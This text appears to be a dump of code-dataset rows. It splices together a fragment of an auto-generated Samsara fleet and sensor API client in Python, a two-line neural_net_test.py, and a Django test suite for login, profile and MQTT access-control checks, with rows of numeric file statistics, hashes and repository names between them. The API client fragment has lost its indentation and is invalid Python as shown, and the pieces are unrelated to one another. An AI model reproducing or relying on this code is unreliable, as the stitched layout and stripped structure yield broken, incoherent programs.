if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HumidityResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_temperature(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_temperature_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_temperature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_temperature`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_temperature`")
collection_formats = {}
resource_path = '/sensors/temperature'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TemperatureResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_fleet_dispatch_jobs(self, access_token, update_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/update
Update dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_fleet_dispatch_jobs(access_token, update_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param UpdateDispatchJobsParam update_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_fleet_dispatch_jobs_with_http_info(access_token, update_dispatch_jobs_param, **kwargs)
else:
(data) = self.update_fleet_dispatch_jobs_with_http_info(access_token, update_dispatch_jobs_param, **kwargs)
return data
def update_fleet_dispatch_jobs_with_http_info(self, access_token, update_dispatch_jobs_param, **kwargs):
"""
/fleet/dispatch_jobs/update
Update dispatch jobs in the specified group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_fleet_dispatch_jobs_with_http_info(access_token, update_dispatch_jobs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param UpdateDispatchJobsParam update_dispatch_jobs_param: (required)
:return: DispatchJobsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'update_dispatch_jobs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_fleet_dispatch_jobs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `update_fleet_dispatch_jobs`")
# verify the required parameter 'update_dispatch_jobs_param' is set
if ('update_dispatch_jobs_param' not in params) or (params['update_dispatch_jobs_param'] is None):
raise ValueError("Missing the required parameter `update_dispatch_jobs_param` when calling `update_fleet_dispatch_jobs`")
collection_formats = {}
resource_path = '/fleet/dispatch_jobs/update'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'update_dispatch_jobs_param' in params:
body_params = params['update_dispatch_jobs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DispatchJobsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_vehicles(self, access_token, vehicle_update_param, **kwargs):
"""
/fleet/set_data
This method enables the mutation of metadata for vehicles in the Samsara Cloud.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_vehicles(access_token, vehicle_update_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param VehicleUpdateParam vehicle_update_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_vehicles_with_http_info(access_token, vehicle_update_param, **kwargs)
else:
(data) = self.update_vehicles_with_http_info(access_token, vehicle_update_param, **kwargs)
return data
def update_vehicles_with_http_info(self, access_token, vehicle_update_param, **kwargs):
"""
/fleet/set_data
This method enables the mutation of metadata for vehicles in the Samsara Cloud.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_vehicles_with_http_info(access_token, vehicle_update_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param VehicleUpdateParam vehicle_update_param: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'vehicle_update_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_vehicles" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `update_vehicles`")
# verify the required parameter 'vehicle_update_param' is set
if ('vehicle_update_param' not in params) or (params['vehicle_update_param'] is None):
raise ValueError("Missing the required parameter `vehicle_update_param` when calling `update_vehicles`")
collection_formats = {}
resource_path = '/fleet/set_data'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'vehicle_update_param' in params:
body_params = params['vehicle_update_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 46.892424
| 1,080
| 0.601818
| 9,783
| 92,847
| 5.448022
| 0.031994
| 0.063154
| 0.017862
| 0.022965
| 0.9618
| 0.944257
| 0.924781
| 0.909359
| 0.900296
| 0.892266
| 0
| 0.00081
| 0.321637
| 92,847
| 1,979
| 1,081
| 46.916119
| 0.845405
| 0.341013
| 0
| 0.772589
| 0
| 0
| 0.199463
| 0.050333
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035533
| false
| 0
| 0.007107
| 0
| 0.095431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40407326a31fabedd75b526298966251f0e9a166
| 80
|
py
|
Python
|
neural_net_test.py
|
gillett-hernandez/neuralnet
|
a6a3e6f4937a69b84d76d3c1c49171e04c242cab
|
[
"MIT"
] | null | null | null |
neural_net_test.py
|
gillett-hernandez/neuralnet
|
a6a3e6f4937a69b84d76d3c1c49171e04c242cab
|
[
"MIT"
] | null | null | null |
neural_net_test.py
|
gillett-hernandez/neuralnet
|
a6a3e6f4937a69b84d76d3c1c49171e04c242cab
|
[
"MIT"
] | null | null | null |
def forward_multiply_gate(x,y):
return x*y
print(forward_multiply_gate(-2,3))
| 16
| 34
| 0.775
| 15
| 80
| 3.866667
| 0.666667
| 0.517241
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027397
| 0.0875
| 80
| 4
| 35
| 20
| 0.767123
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
404b1f04ae14d5599fd78cb9082c66fb6a4d5fe8
| 35,591
|
py
|
Python
|
login/tests/test_login.py
|
shubhamkulkarni01/EMSTrack-Django
|
32ff9ed94a38730c0e9f6385c75060e2d30a930e
|
[
"MIT",
"BSD-3-Clause"
] | 2
|
2020-07-16T01:44:54.000Z
|
2020-10-25T02:08:47.000Z
|
login/tests/test_login.py
|
shubhamkulkarni01/EMSTrack-Django
|
32ff9ed94a38730c0e9f6385c75060e2d30a930e
|
[
"MIT",
"BSD-3-Clause"
] | 8
|
2020-04-20T22:13:56.000Z
|
2022-02-04T17:50:44.000Z
|
login/tests/test_login.py
|
shubhamkulkarni01/EMSTrack-Django
|
32ff9ed94a38730c0e9f6385c75060e2d30a930e
|
[
"MIT",
"BSD-3-Clause"
] | 2
|
2020-07-20T23:39:44.000Z
|
2022-02-24T00:29:10.000Z
|
import logging
from django.test import Client
from django.conf import settings
from django.contrib.auth.hashers import check_password
from rest_framework.parsers import JSONParser
from io import BytesIO
from ambulance.models import Ambulance
from hospital.models import Hospital
from ..models import TemporaryPassword
from ..serializers import UserProfileSerializer
from mqtt.tests.client import MQTTTestCase
logger = logging.getLogger(__name__)
# TODO: Test admin permissions for staff that is not superuser
class MyTestCase(MQTTTestCase):
@classmethod
def setUpClass(cls):
# create server
super().setUpClass()
# instantiate client
cls.client = Client()
class TestProfile(MyTestCase):
def test_user_profile_serializer(self):
self.maxDiff = None
# test ProfileSerializer
# super will see all ambulances and hospitals
u = self.u1
serializer = UserProfileSerializer(u)
result = {
'ambulances': [
{
'ambulance_id': e.pk,
'ambulance_identifier': e.identifier,
'can_read': True,
'can_write': True
}
for e in Ambulance.objects.all()
],
'hospitals': [
{
'hospital_id': e.pk,
'hospital_name': e.name,
'can_read': True,
'can_write': True
}
for e in Hospital.objects.all()
]
}
self.assertDictEqual(serializer.data, result)
# regular users is just like ProfileSerializer
for u in (self.u2, self.u3):
serializer = UserProfileSerializer(u)
result = {
'ambulances': [
{
'ambulance_id': e.ambulance.pk,
'ambulance_identifier': e.ambulance.identifier,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in u.userambulancepermission_set.all()
],
'hospitals': [
{
'hospital_id': e.hospital.pk,
'hospital_name': e.hospital.name,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in u.userhospitalpermission_set.all()
]
}
self.assertDictEqual(serializer.data, result)
# regular users is just like ProfileSerializer with groups
u = self.u4
g = self.g2
serializer = UserProfileSerializer(u)
result = {
'ambulances': [
{
'ambulance_id': e.ambulance.pk,
'ambulance_identifier': e.ambulance.identifier,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in g.groupambulancepermission_set.all()
],
'hospitals': [
{
'hospital_id': e.hospital.pk,
'hospital_name': e.hospital.name,
'can_read': e.can_read,
'can_write': e.can_write
}
for e in g.grouphospitalpermission_set.all()
]
}
self.assertDictEqual(serializer.data, result)
# regular users is just like ProfileSerializer with groups
u = self.u5
g = self.g2
class TestProfileViewset(MyTestCase):
def test_profile_viewset(self):
# instantiate client
client = Client()
# login as admin
client.login(username=settings.MQTT['USERNAME'], password=settings.MQTT['PASSWORD'])
# retrieve own
response = client.get('/en/api/user/{}/profile/'.format(str(self.u1.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u1).data
self.assertDictEqual(result, answer)
# retrieve someone else's
response = client.get('/en/api/user/{}/profile/'.format(str(self.u2.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u2).data
self.assertDictEqual(result, answer)
# retrieve someone else's
response = client.get('/en/api/user/{}/profile/'.format(str(self.u3.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u3).data
self.assertDictEqual(result, answer)
# logout
client.logout()
# login as testuser1
client.login(username='testuser1', password='top_secret')
# retrieve own
response = client.get('/en/api/user/{}/profile/'.format(str(self.u2.username)),
follow=True)
self.assertEqual(response.status_code, 200)
result = JSONParser().parse(BytesIO(response.content))
answer = UserProfileSerializer(self.u2).data
self.assertDictEqual(result, answer)
# retrieve someone else's
response = client.get('/en/api/user/{}/profile/'.format(str(self.u1.username)),
follow=True)
self.assertEqual(response.status_code, 403)
response = client.get('/en/api/user/{}/profile/'.format(str(self.u3.username)),
follow=True)
self.assertEqual(response.status_code, 403)
# logout
client.logout()
class TestLogin(MyTestCase):
def test_login(self):
# blank login
response = self.client.get('/en/auth/login/')
self.assertEqual(response.status_code, 200)
# incorrect username
response = self.client.post('/en/auth/login/', {'username': 'testuser11',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
# incorrect password
response = self.client.post('/en/auth/login/', {'username': 'testuser1',
'password': 'top_secret0'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
# correct login
response = self.client.post('/en/auth/login/', {'username': 'testuser1',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, True)
self.assertEqual(response.context['user'].username, 'testuser1')
self.assertEqual(response.context['user'].is_superuser, False)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
# login user2
response = self.client.post('/en/auth/login/', {'username': 'testuser2',
'password': 'very_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, True)
self.assertEqual(response.context['user'].username, 'testuser2')
self.assertEqual(response.context['user'].is_superuser, False)
# login admin
response = self.client.post('/en/auth/login/', {'username': settings.MQTT['USERNAME'],
'password': settings.MQTT['PASSWORD']},
follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, True)
self.assertEqual(response.context['user'].username, settings.MQTT['USERNAME'])
self.assertEqual(response.context['user'].is_superuser, True)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['user'].is_authenticated, False)
class TestMQTTLogin(MyTestCase):
def test_mqtt_login(self):
# blank login
response = self.client.get('/en/auth/mqtt/login/')
self.assertEqual(response.status_code, 200)
# incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser11',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 403)
# incorrect username superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser11'},
follow=True)
self.assertEqual(response.status_code, 403)
# incorrect password
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser1',
'password': 'top_secret0'},
follow=True)
self.assertEqual(response.status_code, 403)
# incorrect username superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser1'},
follow=True)
self.assertEqual(response.status_code, 403)
# correct login
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser1',
'password': 'top_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
# incorrect username superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser1'},
follow=True)
self.assertEqual(response.status_code, 403)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
# login user2
response = self.client.post('/en/auth/mqtt/login/',
{'username': 'testuser2',
'password': 'very_secret'},
follow=True)
self.assertEqual(response.status_code, 200)
# incorrect username superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': 'testuser2'},
follow=True)
self.assertEqual(response.status_code, 403)
# username superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': settings.MQTT['USERNAME']},
follow=True)
self.assertEqual(response.status_code, 200)
# login admin
response = self.client.post('/en/auth/mqtt/login/',
{'username': settings.MQTT['USERNAME'],
'password': settings.MQTT['PASSWORD']},
follow=True)
self.assertEqual(response.status_code, 200)
# username superuser
response = self.client.post('/en/auth/mqtt/superuser/',
{'username': settings.MQTT['USERNAME']},
follow=True)
self.assertEqual(response.status_code, 200)
# logout
response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
class TestMQTTACLSubscribe(MyTestCase):
def test_mqtt_acl_subscribe(self):
# Settings
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/settings'},
follow=True)
self.assertEqual(response.status_code, 200)
# Profile
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/user/testuser1/profile'},
follow=True)
self.assertEqual(response.status_code, 200)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '2',
'topic': '/user/testuser1/profile'},
follow=True)
self.assertEqual(response.status_code, 403)
# Hospitals
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h1.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h3.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h2.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/hospital/{}/data'.format(self.h1.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/hospital/{}/data'.format(self.h3.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/hospital/{}/data'.format(self.h2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/item/1/data'.format(self.h1.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/item/2/data'.format(self.h3.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/item/3/data'.format(self.h2.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h1.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h3.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/equipment/{}/metadata'.format(self.h2.equipmentholder.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# Ambulances
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't subscribe
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': 'test_client',
'acc': '1',
'topic': '/ambulance/{}/data'.format(self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
class TestMQTTACLPublish(MyTestCase):
def test_mqtt_acl_publish(self):
# Ambulance data
# can't publish
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/ambulance/{}/data'.format(clientid, self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/ambulance/{}/data'.format(clientid, self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/ambulance/{}/data'.format(clientid, self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/ambulance/{}/data'.format(clientid, self.a1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/ambulance/{}/data'.format(clientid, self.a2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/ambulance/{}/data'.format(clientid, self.a3.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# Hospital data
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/hospital/{}/data'.format(clientid, self.h1.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/hospital/{}/data'.format(clientid, self.h2.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser1',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser1/client/{}/hospital/{}/data'.format(clientid, self.h3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/hospital/{}/data'.format(clientid, self.h1.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# can't publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/hospital/{}/data'.format(clientid, self.h2.id)},
follow=True)
self.assertEqual(response.status_code, 200)
# can publish
response = self.client.post('/en/auth/mqtt/acl/',
{'username': 'testuser2',
'clientid': clientid,
'acc': '2',
'topic': '/user/testuser2/client/{}/hospital/{}/data'.format(clientid, self.h3.id)},
follow=True)
self.assertEqual(response.status_code, 403)
# Client data
username = 'testuser2'
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': username,
'clientid': clientid,
'acc': '2',
'topic': '/user/{}/client/{}/status'.format(username, clientid)},
follow=True)
self.assertEqual(response.status_code, 200)
# invalid username
username = 'testuser2'
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': username,
'clientid': clientid,
'acc': '2',
'topic': '/user/{}/client/{}/status'.format(username + 'o', clientid)},
follow=True)
self.assertEqual(response.status_code, 403)
# invalid clientid
username = 'testuser2'
clientid = 'test_client'
response = self.client.post('/en/auth/mqtt/acl/',
{'username': username,
'clientid': clientid,
'acc': '2',
'topic': '/user/{}/client/{}/status'.format(username, clientid + 'o')},
follow=True)
self.assertEqual(response.status_code, 403)
class TestMQTTLoginTempPassword(MyTestCase):
def test(self):
# instantiate client
client = Client()
# retrieve password hash without being logged in
username = 'admin'
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
result = JSONParser().parse(BytesIO(response.content))
self.assertEqual(response.status_code, 403)
self.assertEqual(result,
{'detail': 'Authentication credentials were not provided.'})
# login as admin
username = settings.MQTT['USERNAME']
client.login(username=settings.MQTT['USERNAME'],
password=settings.MQTT['PASSWORD'])
# retrieve password hash
response = client.get('/en/api/user/{}/password/'.format(username),
follow=True)
self.assertEqual(response.status_code, 200)
encoded = JSONParser().parse(BytesIO(response.content))
# retrieve temporary password
